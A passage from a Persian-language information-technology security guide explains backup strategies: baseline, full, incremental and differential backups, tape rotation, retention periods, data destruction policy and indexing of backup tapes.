‫ﺑﺮﻧﺎﻣﻪﻫﺎ ﺭﻭﻱ ﺷﺎﺧﻪﻫﺎﻱ ﺭﺯﺭﻭﺷﺪﺓ ﺳﻴﺴﺘﻢﻋﺎﻣﻞ ﻧﺼﺐ ﻣﻲﺷﻮﻧﺪ؛ ﻣﺜﻞ ﺣﻔﺮﻩﻫﺎﻱ ﺍﻣﻨﻴﺘﻲ ﻛﻪ ﻛﺸﻒ ﻭ ﺍﺻﻼﺡ ﻣـﻲﺷـﻮﻧﺪ ﻭ ﻳـﺎ ﺗﻐﻴﻴـﺮﺍﺕ‬
‫ﺩﻳﮕﺮﻱ ﻛﻪ ﺭﺥ ﻣﻲﺩﻫﻨﺪ‪ .‬ﺍﮔﺮ ﺗﺎ ﻛﻨﻮﻥ ﻳﻜﺒﺎﺭ ﺳﻌﻲ ﻛﺮﺩﻩ ﺑﺎﺷﻴﺪ ﺳﻴﺴﺘﻢ ﺧﻮﺩ ﺭﺍ ﺑﻌﺪ ﺍﺯ ﻭﻗﻮﻉ ﻳﻚ ﺧﺮﺍﺑﻲ ﺑﺎﺯﺳـﺎﺯﻱ ﻛﻨﻴـﺪ‪ ،‬ﻣـﻲﺩﺍﻧﻴـﺪ ﺍﮔـﺮ‬
‫ﻫﺮﭼﻴﺰﻱ ﺳﺮ ﺟﺎﻱ ﺧﻮﺩ ﺑﺎﺷﺪ ﺭﻭﻧﺪ ﺍﻧﺠﺎﻡ ﻛﺎﺭ ﭼﻘﺪﺭ ﺳﺎﺩﻩﺗﺮ ﺍﺳﺖ‪.‬‬
‫ﺑﻪ ﻫﻤﻴﻦ ﺩﻟﻴﻞ ﺗﻮﺻﻴﻪ ﻣﻲﺷﻮﺩ ﻛﻪ ﻫﻤﻪ ﭼﻴﺰ ﺳﻴﺴﺘﻢ ﺧﻮﺩ ﺭﺍ )ﺑﻪ ﺍﻳﻦ ﻣﻌﻨﺎ ﻛﻪ ﻫﺮﭼﻴﺰﻱ ﻛﻪ ﺑﺮﺍﻱ ﻧﺼﺐ ﻣﺠـﺪﺩ ﺳﻴـﺴﺘﻢ ﻧﻴـﺎﺯ ﺍﺳـﺖ ‪ -‬ﺍﺯ ﺟﻤﻠـﻪ ﻫﻤـﺔ‬
‫ﻓﺎﻳﻠﻬﺎﻱ ﻧﻬﺎﻳﻲ ﺭﺍ( ﻫﺮ ﺍﺯ ﭼﻨﺪﮔﺎﻩ ﺩﺭ ﺑﺎﺯﻩﻫﺎﻱ ﻣﻌﻴﻦ ﺯﻣﺎﻧﻲ ﺭﻭﻱ ﺭﺳﺎﻧﺔ ﭘﺸﺘﻴﺒﺎﻥ ﺫﺧﻴﺮﻩ ﻛﻨﻴﺪ‪ .‬ﻃﻮﻝ ﺍﻳﻦ ﺑﺎﺯﻩ ﺯﻣـﺎﻧﻲ ﺑـﻪ ﺳـﺮﻋﺖ ﺗﺠﻬﻴـﺰﺍﺕ‬
‫ﭘﺸﺘﻴﺒﺎﻥﮔﻴﺮ ﺷﻤﺎ ﻭ ﻣﻴﺰﺍﻥ ﻓﻀﺎﻱ ﺣﺎﻓﻈﺔ ﺍﺧﺘﺼﺎﺹ ﺩﺍﺩﻩ ﺷﺪﻩ ﺑﻪ ﭘـﺸﺘﻴﺒﺎﻧﻬﺎ ﻭ ﻫﻤﭽﻨـﻴﻦ ﻧﻴﺎﺯﻫـﺎﻱ ﺳـﺎﺯﻣﺎﻥ ﺷـﻤﺎ ﺑـﺴﺘﮕﻲ ﺩﺍﺭﺩ‪ .‬ﺷـﺎﻳﺪ‬
‫ﺑﺨﻮﺍﻫﻴﺪ ﻫﻔﺘﻪﺍﻱ ﻳﻜﺒﺎﺭ ﭘﺸﺘﻴﺒﺎﻥ ﻛﺎﻣﻞ ﺗﻬﻴﻪ ﻛﻨﻴﺪ‪ ،‬ﻭ ﻳﺎ ﺷﺎﻳﺪ ﺑﺨﻮﺍﻫﻴﺪ ﺗﻨﻬﺎ ﺩﻭ ﺑﺎﺭ ﺩﺭ ﺳﺎﻝ ﺍﻳﻨﻜﺎﺭ ﺭﺍ ﺍﻧﺠﺎﻡ ﺩﻫﻴﺪ‪.‬‬

‫ﺍﻧﻮﺍﻉ ﭘﺸﺘﻴﺒﺎﻥﻫﺎ‬
‫ﺳﻪ ﻧﻮﻉ ﻛﻠﻲ ﭘﺸﺘﻴﺒﺎﻥ ﻭﺟﻮﺩ ﺩﺍﺭﺩ‪ :‬ﭘﺸﺘﻴﺒﺎﻥ ﺳﻄﺢ ﺻﻔﺮ )ﺭﻭﺯ ﺻﻔﺮ(‪ ،‬ﭘﺸﺘﻴﺒﺎﻥ ﻛﺎﻣﻞ‪ ،‬ﻭ ﭘﺸﺘﻴﺒﺎﻥ ﺍﻓﺰﺍﻳﺸﻲ‪.‬‬

‫ﭘﺸﺘﻴﺒﺎﻥ ﺳﻄﺢ ﺻﻔﺮ )ﺭﻭﺯ ﺻﻔﺮ(‬


‫ﺍﺯ ﺳﻴﺴﺘﻢ ﺍﺻﻠﻲ ﺷﻤﺎ ﻳﻚ ﻛﭙﻲ ﺗﻬﻴﻪ ﻣﻲﻛﻨﺪ‪ .‬ﻭﻗﺘﻲ ﺳﻴﺴﺘﻢ ﺷﻤﺎ ﺑﺮﺍﻱ ﺑﺎﺭ ﺍﻭﻝ ﻧﺼﺐ ﻣﻲﺷﻮﺩ‪ ،‬ﭘﻴﺶ ﺍﺯ ﺁﻧﻜﻪ ﺍﻓﺮﺍﺩ ﺷﺮﻭﻉ ﺑـﻪ ﺍﺳـﺘﻔﺎﺩﻩ ﺍﺯ‬
‫ﺁﻥ ﺑﻜﻨﻨﺪ‪ ،‬ﺍﺯ ﻫﺮ ﻓﺎﻳﻞ ﻭ ﺑﺮﻧﺎﻣﻪ ﺩﺭ ﺳﻴﺴﺘﻢ ﭘﺸﺘﻴﺒﺎﻥ ﺗﻬﻴﻪ ﻛﻨﻴﺪ‪ .‬ﺍﮔﺮ ﺍﻳﻦ ﭘﺸﺘﻴﺒﺎﻥﮔﻴﺮﻱ ﺑﻌﺪ ﺍﺯ ﻳﻚ ﻧﻔﻮﺫ ﻣﻮﻓﻘﻴﺖﺁﻣﻴﺰ ﺑـﻪ ﺳﻴـﺴﺘﻢ ﺍﻧﺠـﺎﻡ‬
‫ﻼ ﺑﻲﺍﺭﺯﺵ ﺑﺎﺷﺪ‪.‬‬‫ﺷﻮﺩ ﻣﻤﻜﻦ ﺍﺳﺖ ﻛﺎﻣ ﹰ‬

‫ﭘﺸﺘﻴﺒﺎﻥ ﻛﺎﻣﻞ‬
‫ﺍﺯ ﻫﺮ ﻓﺎﻳﻞ ﺭﺍﻳﺎﻧﻪ ﻳﻚ ﻛﭙﻲ ﺭﻭﻱ ﭘﺸﺘﻴﺒﺎﻥ ﮔﺮﻓﺘﻪ ﻣﻲﺷﻮﺩ‪ .‬ﺍﻳﻦ ﺭﻭﺵ ﻣﺸﺎﺑﻪ "ﭘﺸﺘﻴﺒﺎﻥ ﺭﻭﺯ ﺻﻔﺮ" ﺍﺳﺖ‪ ،‬ﺟﺰ ﺍﻳﻨﻜﻪ ﻫـﺮ ﺍﺯ ﭼﻨـﺪﮔﺎﻩ ﺍﻧﺠـﺎﻡ‬
‫ﻣﻲﺷﻮﺩ‪.‬‬

‫‪118 Customized‬‬
‫‪٣٠٩‬‬ ‫ﺑﺨﺶ ﭘﻨﺠﻢ‪ :‬ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﻭ ﺭﺍﻫﺒﺮﺍﻥ ﻓﻨﻲ‬

‫ﭘﺸﺘﻴﺒﺎﻥ ﺍﻓﺰﺍﻳﺸﻲ‬
‫ﺗﻨﻬﺎ ﺍﺯ ﻓﺎﻳﻠﻬﺎﻳﻲ ﻧﺴﺨﻪﺑﺮﺩﺍﺭﻱ ﻣﻲﺷﻮﺩ ﻛﻪ ﺑﻌﺪ ﺍﺯ ﻳﻚ ﺍﺗﻔﺎﻕ ﺧﺎﺹ )ﻣﺜﻞ ﺍﺻﻼﺡ ﺑﺮﻧﺎﻣﺔ ﻛﺎﺭﺑﺮﺩﻱ ﺩﺍﺭﺍﻱ ﺿﻌﻒ( ﻳﺎ ﺗﺎﺭﻳﺦ ﺧﺎﺹ )ﻣﺜﻞ ﺗﺎﺭﻳﺦ ﺗﻬﻴـﺔ‬
‫ﻻ ﺩﺭ ﻛﻨﺎﺭ ﻫﻢ ﺍﺳﺘﻔﺎﺩﻩ ﻣﻲﺷﻮﺩ‪ .‬ﺍﻣـﺮﻭﺯﻩ ﺍﺳـﺘﺮﺍﺗﮋﻱ ﺭﺍﻳـﺞ‬
‫ﺁﺧﺮﻳﻦ ﭘﺸﺘﻴﺒﺎﻥ ﻛﺎﻣﻞ( ﺗﻐﻴﻴﺮ ﻛﺮﺩﻩﺍﻧﺪ‪ .‬ﺍﺯ ﭘﺸﺘﻴﺒﺎﻥ ﻛﺎﻣﻞ ﻭ ﭘﺸﺘﻴﺒﺎﻥ ﺍﻓﺰﺍﻳﺸﻲ ﻣﻌﻤﻮ ﹰ‬
‫ﭘﺸﺘﻴﺒﺎﻥﮔﻴﺮﻱ ﺑﺸﺮﺡ ﺯﻳﺮ ﺍﺳﺖ‪:‬‬

‫ﺗﻬﻴﺔ ﭘﺸﺘﻴﺒﺎﻥ ﻛﺎﻣﻞ ﺩﺭ ﺍﻭﻟﻴﻦ ﺭﻭﺯ ﻫﻔﺘﻪ ﺑﺼﻮﺭﺕ ﻳﻚ ﻫﻔﺘﻪ ﺩﺭ ﻣﻴﺎﻥ؛ ﻭ‬ ‫•‬
‫ﺗﻬﻴﺔ ﭘﺸﺘﻴﺒﺎﻥ ﺍﻓﺰﺍﻳﺸﻲ ﺩﺭ ﭘﺎﻳﺎﻥ ﻫﺮ ﺍﺗﻔﺎﻗﻲ ﻛﻪ ﭘﺲ ﺍﺯ ﺗﻬﻴﺔ ﺁﺧﺮﻳﻦ ﭘﺸﺘﻴﺒﺎﻥ ﻛﺎﻣﻞ ﺩﺭ ﺳﻴﺴﺘﻢ ﻣﻲﺍﻓﺘﺪ‪ .‬ﺍﻳﻦ ﻧﻮﻉ ﭘﺸﺘﻴﺒﺎﻥ ﺍﻓﺰﺍﻳﺸﻲ‬ ‫•‬
‫ﺍﺯ ﺁﻧﺠﺎ ﻛﻪ ﺁﻧﺪﺳﺘﻪ ﻓﺎﻳﻠﻬﺎﻳﻲ ﺭﺍ ﺑﺎﻳﮕﺎﻧﻲ ﻣﻲﻛﻨﺪ ﻛﻪ ﺍﺯ ﺯﻣﺎﻥ ﺗﻬﻴﻪ ﺁﺧﺮﻳﻦ ﭘﺸﺘﻴﺒﺎﻥ ﻛﺎﻣﻞ ﺗﻐﻴﻴﺮ ﻛـﺮﺩﻩﺍﻧـﺪ‪ ،‬ﮔـﺎﻫﻲ ﺍﻭﻗـﺎﺕ ﭘـﺸﺘﻴﺒﺎﻥ‬
‫ﺗﻔﺎﻭﺗﻲ‪ ١١٩‬ﻧﺎﻣﻴﺪﻩ ﻣﻲﺷﻮﺩ‪.‬‬
‫ﺍﻛﺜﺮ ﺭﺍﻫﺒﺮﺍﻥ ﺳﻴﺴﺘﻤﻬﺎﻱ ﺑﺰﺭﮒ ﺗﻬﻴﺔ ﭘـﺸﺘﻴﺒﺎﻧﻬﺎﻱ ﺧـﻮﺩ ﺭﺍ ﺑـﺮ ﺍﺳـﺎﺱ ‪ partition‬ﻳـﺎ ﺩﻳـﺴﻚﮔـﺮﺩﺍﻥ ﻃﺮﺍﺣـﻲ ﻭ ﺫﺧﻴـﺮﻩ ﻣـﻲﻛﻨﻨـﺪ‪.‬‬
‫ﻻ ﺑﻪ ﺍﺳﺘﺮﺍﺗﮋﻳﻬﺎﻱ ﻣﺨﺘﻠﻒ ﭘﺸﺘﻴﺒﺎﻥﮔﻴﺮﻱ ﻧﻴﺎﺯ ﺩﺍﺭﻧﺪ‪ .‬ﺑﺮ ﺍﺳﺎﺱ ﺍﻳـﻦ ﻧﻈﺮﻳـﻪ ﻛـﻪ ﻫـﺮ ﺗﻐﻴﻴـﺮﻱ ﻛـﻪ ﺷـﻤﺎ‬ ‫‪partition‬ﻫﺎﻱ ﻣﺘﻔﺎﻭﺕ ﻣﻌﻤﻮ ﹰ‬
‫ﻣﻲﺩﻫﻴﺪ ﺑﺴﻴﺎﺭ ﭘﺮ ﺍﻫﻤﻴﺖ ﺍﺳﺖ‪ ،‬ﺑﺮﺧﻲ ﺍﺯ ‪partition‬ﻫﺎ ﻣﺜﻞ ‪ partition‬ﺳﻴﺴﺘﻢ ﺷﻤﺎ )ﺍﮔﺮ ﺍﺯ ﻫﻢ ﺟﺪﺍ ﺑﺎﺷﻨﺪ( ﻗﺎﻋﺪﺗﹰﺎ ﺑﺎﻳﺪ ﻫﺮ ﺯﻣـﺎﻥ ﻛـﻪ ﺩﺭ‬
‫ﺁﻧﻬﺎ ﺗﻐﻴﻴﺮ ﺍﻳﺠﺎﺩ ﻣﻲﺷﻮﺩ ﭘﺸﺘﻴﺒﺎﻥﮔﻴﺮﻱ ﺷﻮﻧﺪ‪ .‬ﺑﺮﺍﻱ ﺍﻳﻦ ﺳﻴﺴﺘﻤﻬﺎ ﺑﺠﺎﻱ ﭘﺸﺘﻴﺒﺎﻥ ﺍﻓﺰﺍﻳﺸﻲ ﺑﺎﻳﺪ ﺍﺯ ﭘﺸﺘﻴﺒﺎﻧﻬﺎﻱ ﻛﺎﻣـﻞ ﺑﻬـﺮﻩ ﺑـﺮﺩ‪ ،‬ﺯﻳـﺮﺍ‬
‫ﭘﺸﺘﻴﺒﺎﻥ ﺁﻧﻬﺎ ﻓﻘﻂ ﺩﺭﺻﻮﺭﺕ ﻛﺎﻣﻞ ﺑﻮﺩﻥ ﻗﺎﺑﻞ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺳﺖ‪ .‬ﻫﻤﻴﻨﻄﻮﺭ ﺑﺨﺸﻬﺎﻳﻲ ﻛﻪ ﺗﻨﻬﺎ ﺑﺮﺍﻱ ﺫﺧﻴـﺮﻩ ﻛـﺮﺩﻥ ﺑﺮﻧﺎﻣـﻪﻫـﺎﻱ ﻛـﺎﺭﺑﺮﺩﻱ‬
‫ﺍﺳﺘﻔﺎﺩﻩ ﻣﻲﺷﻮﻧﺪ ﺗﻨﻬﺎ ﻫﻨﮕﺎﻣﻲ ﺑﻪ ﭘﺸﺘﻴﺒﺎﻥﮔﻴﺮﻱ ﻧﻴﺎﺯ ﺩﺍﺭﻧﺪ ﻛﻪ ﺑﺮﻧﺎﻣﻪﻫﺎﻱ ﺟﺪﻳﺪ ﻧﺼﺐ ﺷﻮﻧﺪ ﻭ ﻳﺎ ﭘﻴﻜﺮﺑﻨﺪﻱ ﺑﺮﻧﺎﻣﻪﻫـﺎﻱ ﻣﻮﺟـﻮﺩ ﺗﻐﻴﻴـﺮ‬
‫ﻛﻨﻨﺪ‪.‬‬
‫ﺍﺯ ﻃﺮﻑ ﺩﻳﮕﺮ ﭘﺸﺘﻴﺒﺎﻥﮔﻴﺮﻱﻫﺎﻱ ﺍﻓﺰﺍﻳﺸﻲ ﺑﺮﺍﻱ ‪partition‬ﻫﺎﻳﻲ ﻛﻪ ﺟﻬﺖ ﺫﺧﻴﺮﺓ ﻓﺎﻳﻠﻬﺎﻱ ﻛﺎﺭﺑﺮ ﻣﻮﺭﺩ ﺍﺳﺘﻔﺎﺩﻩ ﻗﺮﺍﺭ ﻣﻲﮔﻴﺮﻧﺪ ﻣﻨﺎﺳﺒﺘﺮ‬
‫ﺍﺳﺖ؛ ﺍﻣﺎ ﻣﻤﻜﻦ ﺍﺳﺖ ﺷﻤﺎ ﺑﺨﻮﺍﻫﻴﺪ ﻣﻜﺮﺭﹰﺍ ﺍﺯ ﺍﻳﻦ ﻧﻮﻉ ﭘﺸﺘﻴﺒﺎﻥﮔﻴﺮﻱ ﺍﺳﺘﻔﺎﺩﻩ ﻛﻨﻴﺪ ﺗﺎ ﺩﺭﺻﻮﺭﺕ ﻭﻗﻮﻉ ﺧﺮﺍﺑﻲ‪ ،‬ﻣﻘﺪﺍﺭ ﻛـﺎﺭﻱ ﻛـﻪ ﺍﻣﻜـﺎﻥ‬
‫ﺩﺍﺭﺩ ﺍﺯ ﺩﺳﺖ ﺑﺪﻫﻴﺪ ﺭﺍ ﺑﻪ ﺣﺪﺍﻗﻞ ﺭﺳﺎﻧﺪﻩ ﺑﺎﺷﻴﺪ‪.‬‬
‫ﻫﻨﮕﺎﻣﻴﻜﻪ ﭘﺸﺘﻴﺒﺎﻧﻴﻬﺎﻱ ﺍﻓﺰﺍﻳﺸﻲ ﺍﻳﺠﺎﺩ ﻣﻲﻛﻨﻴﺪ‪ ،‬ﺍﺯ ﻳﻚ ﻣﺠﻤﻮﻋﻪ ﻧﻮﺍﺭﻫﺎ ﻳﺎ ﺩﻳﺴﻜﻬﺎﻱ ﭘﺸﺘﻴﺒﺎﻥﮔﻴﺮﻱ ﺑﺼﻮﺭﺕ ﭼﺮﺧﺸﻲ ﺍﺳـﺘﻔﺎﺩﻩ ﻛﻨﻴـﺪ‪.‬‬
‫ﻧﺴﺨﺔ ﭘﺸﺘﻴﺒﺎﻥ ﺍﻣﺸﺐ ﻧﺒﺎﻳﺪ ﺑﺮ ﺭﻭﻱ ﻧﻮﺍﺭﻱ ﻛﻪ ﺑﺮﺍﻱ ﻧﺴﺨﻪ ﭘﺸﺘﻴﺒﺎﻥ ﺷﺐ ﮔﺬﺷﺘﻪ ﺍﺯ ﺁﻥ ﺍﺳـﺘﻔﺎﺩﻩ ﺷـﺪﻩ ﻧﻮﺷـﺘﻪ ﺷـﻮﺩ‪ .‬ﺩﺭ ﻏﻴﺮﺍﻳﻨـﺼﻮﺭﺕ‬
‫ﭼﻨﺎﻧﭽﻪ ﺭﺍﻳﺎﻧﻪ ﺩﺭ ﺍﻭﺍﺳﻂ ﭘﺸﺘﻴﺒﺎﻥﮔﻴﺮﻱ ﺍﻣﺸﺐ ﺧﺮﺍﺏ ﺷﻮﺩ‪ ،‬ﺷﻤﺎ ﻫﻤﺔ ﺩﺍﺩﻩﻫﺎﻱ ﺭﻭﻱ ﺩﻳﺴﻚ ﺭﺍ ﺍﺯ ﺩﺳﺖ ﺧﻮﺍﻫﻴﺪ ﺩﺍﺩ‪ :‬ﺩﺍﺩﻩﻫﺎﻱ ﭘـﺸﺘﻴﺒﺎﻥ‬
‫ﺍﻣﺸﺐ )ﭼﻮﻥ ﻧﺎﻗﺺ ﺍﺳﺖ(‪ ،‬ﻭ ﺩﺍﺩﻩﻫﺎﻱ ﭘﺸﺘﻴﺒﺎﻥ ﺷﺐ ﮔﺬﺷﺘﻪ )ﭼﻮﻥ ﻗﺴﻤﺘﻲ ﺍﺯ ﺁﻥ ﺑﻮﺳـﻴﻠﻪ ﭘـﺸﺘﻴﺒﺎﻥ ﺍﻣـﺸﺐ ﺟـﺎﻳﮕﺰﻳﻦ ﺷـﺪﻩ ﺍﺳـﺖ(‪ .‬ﺑﻄـﻮﺭ ﺍﻳـﺪﻩﺁﻝ‬
‫ﺐ ﻫﻔﺘﻪ ﻳﻚ ﻧﻮﺍﺭ ﻣﺠﺰﺍ ﺩﺍﺷﺘﻪ ﺑﺎﺷﻴﺪ‪.‬‬ ‫ﭘﺸﺘﻴﺒﺎﻥﮔﻴﺮﻱ ﺍﻓﺰﺍﻳﺸﻲ ﺭﺍ ﺷﺒﻲ ﻳﻜﺒﺎﺭ ﺍﻧﺠﺎﻡ ﺩﻫﻴﺪ‪ ،‬ﻭ ﺑﺮﺍﻱ ﻫﺮ ﺷ ﹺ‬

‫ﭘﺸﺘﻴﺒﺎﻥ ﺭﺍ ﺗﺎ ﭼﻪ ﺯﻣﺎﻧﻲ ﻧﮕﻪ ﺩﺍﺭﻳﻢ‬


‫ﺑﺨﺶ ﭘﻨﺠﻢ‬

‫ﻣﻤﻜﻦ ﺍﺳﺖ ﻳﻚ ﻫﻔﺘﻪ ﻳﺎ ﻳﻚ ﻣﺎﻩ ﻃﻮﻝ ﺑﻜﺸﺪ ﺗﺎ ﻣﺘﻮﺟﻪ ﺷﻮﻳﺪ ﻛﻪ ﻳﻚ ﻓﺎﻳﻞ ﺣﺬﻑ ﺷﺪﻩ ﺍﺳﺖ‪ .‬ﺑﻨﺎﺑﺮﺍﻳﻦ ﺷـﻤﺎ ﺑﺎﻳـﺪ ﺑﻌـﻀﻲ ﺍﺯ ﻧﻮﺍﺭﻫـﺎﻱ‬
‫ﭘﺸﺘﻴﺒﺎﻥ ﺭﺍ ﺑﻤﺪﺕ ﻳﻜﻬﻔﺘﻪ‪ ،‬ﺑﻌﻀﻲ ﺭﺍ ﻳﻜﻤﺎﻩ‪ ،‬ﻭ ﺑﻌﻀﻲ ﺭﺍ ﭼﻨﺪﻳﻦ ﻣﺎﻩ ﻧﮕﻬﺪﺍﺭﻱ ﻛﻨﻴﺪ‪ .‬ﺑﺴﻴﺎﺭﻱ ﺍﺯ ﺳﺎﺯﻣﺎﻧﻬﺎ ﭘﺸﺘﻴﺒﺎﻧﻬﺎﻱ ﺳﺎﻻﻧﻪ ﻳﺎ ‪ ۳‬ﻣﺎﻫـﺔ‬
‫ﺧﻮﺩ ﺭﺍ ﺑﺮﺍﻱ ﻫﻤﻴﺸﻪ ﺁﺭﺷﻴﻮ ﻣﻲﻛﻨﻨﺪ‪ .‬ﺑﻌﻀﻲ ﺍﺯ ﺳﺎﺯﻣﺎﻧﻬﺎ ﻧﻴﺰ ﭘﺸﺘﻴﺒﺎﻧﻬﺎﻱ ﺳﺎﻻﻧﻪ ﻳﺎ ﺩﻭﺳﺎﻻﻧﺔ ﺧﻮﺩ ﺭﺍ ﺑﺮﺍﻱ ﻫﻤﻴﺸﻪ ﻧﮕﻬـﺪﺍﺭﻱ ﻣـﻲﻛﻨﻨـﺪ‪،‬‬
‫ﭼﺮﺍﮐﻪ ﺑﻪ ﻫﺮﺣﺎﻝ ﺍﻧﺠﺎﻡ ﺍﻳﻨﻜﺎﺭ ﺩﺭ ﻣﻘﺎﺑﻞ ﺍﻳﻦ ﺍﻣﻜﺎﻥ ﻛﻪ ﺁﻧﻬﺎ ﺭﻭﺯﻱ ﺑﻜﺎﺭ ﺁﻳﻨﺪ ﺳﺮﻣﺎﻳﻪﮔﺬﺍﺭﻱ ﺍﻧـﺪﻛﻲ ﺑـﻪ ﺣـﺴﺎﺏ ﻣـﻲﺁﻳـﺪ‪ .‬ﺩﺭ ﺑﻌـﻀﻲ ﺍﺯ‬
‫ﻛﺸﻮﺭﻫﺎ ﻣﻤﻜﻦ ﺍﺳﺖ ﺷﺮﺍﻳﻂ ﻗﺎﻧﻮﻧﻲ ﻭﺟﻮﺩ ﺩﺍﺷﺘﻪ ﺑﺎﺷﺪ ﻛﻪ ﻧﮕﻬﺪﺍﺭﻱ ﭘﺸﺘﻴﺒﺎﻧﻬﺎﻱ ﺍﻧﻮﺍﻉ ﺧﺎﺻﻲ ﺍﺯ ﺩﺍﺩﻩﻫﺎ )ﻣﺜﻞ ﺛﺒﺘﻬﺎﻱ ﺣـﺴﺎﺑﺪﺍﺭﻱ( ﺭﺍ ﺑـﺮﺍﻱ‬
‫ﻳﻚ ﺩﻭﺭﺓ ﺣﺪﺍﻗﻠﻲ ﺍﻟﺰﺍﻣﻲ ﮐﺮﺩﻩ ﺑﺎﺷﺪ‪ .‬ﺍﺯ ﻃﺮﻑ ﺩﻳﮕﺮ ﺩﺍﺷﺘﻦ ﻳﻚ ﺳﻴﺎﺳﺖ ﺑﺮﺍﻱ ﺗﺨﺮﻳﺐ ﺩﺍﺩﻩﻫﺎ‪ ١٢٠‬ﻛﻪ ﺣﺪﺍﻛﺜﺮ ﺯﻣﺎﻥ ﻧﮕﻬﺪﺍﺭﻱ ﭘـﺸﺘﻴﺒﺎﻧﻬﺎ‬
‫ﺭﺍ ﻣﺸﺨﺺ ﻣﻲﻛﻨﺪ ﻧﻴﺰ ﺣﺎﺋﺰ ﺍﻫﻤﻴﺖ ﺍﺳﺖ‪.‬‬
‫ﻣﻤﻜﻦ ﺍﺳﺖ ﺷﻤﺎ ﺑﺨﻮﺍﻫﻴﺪ ﻳﻚ ﻧﺸﺎﻧﻪﮔﺮ ﻳﺎ ﻓﻬﺮﺳﺖ ﺍﺯ ﺍﺳﺎﻣﻲ ﻓﺎﻳﻠﻬﺎﻱ ﺭﻭﻱ ﻧﻮﺍﺭﻫﺎﻱ ﭘﺸﺘﻴﺒﺎﻥ ﺧﻮﺩ ﻧﮕﻬﺪﺍﺭﻳﺪ‪ .‬ﺑﺎ ﺍﻳﻦ ﺭﻭﺵ ﻫﺮ ﻭﻗﺖ ﺑـﻪ‬
‫ﺍﺣﻴﺎﻱ ﻣﺠﺪﺩ ﻳﻚ ﻓﺎﻳﻞ ﻧﻴﺎﺯ ﭘﻴﺪﺍ ﻛﻨﻴﺪ‪ ،‬ﺑﺠﺎﻱ ﺍﻳﻨﻜﻪ ﻣﺠﺒﻮﺭ ﺷﻮﻳﺪ ﻫﺮ ﻧﻮﺍﺭ ﺭﺍ ﺑﻄﻮﺭ ﺟﺪﺍﮔﺎﻧﻪ ﺑﺨﻮﺍﻧﻴﺪ ﻣﻲﺗﻮﺍﻧﻴﺪ ﺑﺎ ﺑﺮﺭﺳـﻲ ﻓﻬﺮﺳـﺖ‪ ،‬ﻧـﻮﺍﺭ‬

‫‪119 Differential Backup‬‬


‫‪120 Data Destruction‬‬
‫ﺭﺍﻫﻨﻤﺎﻱ ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ‬ ‫‪٣١٠‬‬

‫ﺻﺤﻴﺢ ﺑﺮﺍﻱ ﺍﺳﺘﻔﺎﺩﻩ ﺭﺍ ﭘﻴﺪﺍ ﻛﻨﻴﺪ‪ .‬ﺩﺭ ﺩﺳﺖ ﺩﺍﺷﺘﻦ ﻳﻚ ﻧﺴﺨﺔ ﭼﺎﭘﻲ ﺍﺯ ﺍﻳﻦ ﻓﻬﺮﺳﺘﻬﺎ ﻫﻢ ﺍﻳﺪﺓ ﺧـﻮﺑﻲ ﺍﺳـﺖ‪ ،‬ﺧـﺼﻮﺻﹰﺎ ﺍﮔـﺮ ﻓﻬﺮﺳـﺖ‬
‫ﺍﻟﮑﺘﺮﻭﻧﻴﮑﻲ ﺷﻤﺎ ﺭﻭﻱ ﺳﻴﺴﺘﻤﻲ ﻗﺮﺍﺭ ﺩﺍﺷﺘﻪ ﺑﺎﺷﺪ ﻛﻪ ﻣﻤﻜﻦ ﺍﺳﺖ ﻻﺯﻡ ﺑﺎﺷﺪ ﺍﺣﻴﺎ ﺷﻮﺩ!‬
‫ﺍﮔﺮ ﺍﺯ ﭘﺸﺘﻴﺒﺎﻧﻬﺎ ﺑﺮﺍﻱ ﻣﺪﺕ ﻃﻮﻻﻧﻲ ﻧﮕﻬﺪﺍﺭﻱ ﻣﻲﻛﻨﻴﺪ‪ ،‬ﻣﻄﻤﺌﻦ ﺷﻮﻳﺪ ﺯﻣﺎﻧﻲ ﻛﻪ ﻳﻚ ﺳﻴـﺴﺘﻢ ﭘـﺸﺘﻴﺒﺎﻥ ﺟﺪﻳـﺪ ﺧﺮﻳـﺪﺍﺭﻱ ﻣـﻲﻛﻨﻴـﺪ‪،‬‬
‫ﺩﺍﺩﻩﻫﺎﻱ ﭘﺸﺘﻴﺒﺎﻥ ﺑﺪﺭﺳﺘﻲ ﺭﻭﻱ ﺁﻥ ﻣﻨﺘﻘﻞ ﻣﻲﺷﻮﻧﺪ‪ .‬ﺩﺭ ﻏﻴﺮ ﺍﻳﻨﺼﻮﺭﺕ ﻣﻤﻜﻦ ﺍﺳﺖ ﺑﺎ ﻧﻮﺍﺭﻫﺎﻳﻲ ﻣﻮﺍﺟﻪ ﺷﻮﻳﺪ ﻛـﻪ ﺑﻮﺳـﻴﻠﺔ ﻫـﻴﭽﻜﺲ ﻭ‬
‫ﻫﻴﭻ ﻛﺠﺎ ﻧﻤﻲﺗﻮﺍﻥ ﺁﻧﻬﺎ ﺭﺍ ﺧﻮﺍﻧﺪ‪ .‬ﺍﻳﻦ ﻣﻮﺿﻮﻉ ﺑﺮﺍﻱ ﺩﺍﻧﺸﮕﺎﻫﻬﺎﻱ ﺗﺤﻘﻴﻘﺎﺗﻲ ﻣﻬﻢ ﻭ ﺣﺘﻲ ﻣﺆﺳﺴﺔ ﻣﻠﻲ ﺭﺍﻫﺒﺮﻱ ﻓﻀﺎﻳﻲ ﻭ ﻫﻮﺍﻳﻲ ﺍﻳﺎﻻﺕ‬
‫ﻣﺘﺤﺪﻩ )‪ ١٢١(NASA‬ﻫﻢ ﺭﻭﻱ ﺩﺍﺩﻩ ﺍﺳﺖ‪.‬‬

‫ﺳﺎﻳﺮ ﻧﻜﺎﺕ ﺗﻬﻴﺔ ﭘﺸﺘﻴﺒﺎﻥ‬


‫ﭼﻨﺪ ﺭﺍﻫﻜﺎﺭ ﻣﻨﺎﺳﺐ ﺩﻳﮕﺮ ﺑﺮﺍﻱ ﺍﻓﺰﺍﻳﺶ ﻗﺎﺑﻠﻴﺖ ﺍﻃﻤﻴﻨﺎﻥ ﭘﺸﺘﻴﺒﺎﻥ ﻭﺟﻮﺩ ﺩﺍﺭﺩ‪:‬‬

‫ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﻣﺠﻤﻮﻋﻪﻫﺎﻱ ﺗﻜﺮﺍﺭﺷﻮﻧﺪﺓ ﭘﺸﺘﻴﺒﺎﻥ‬


‫‪١٢٢‬‬
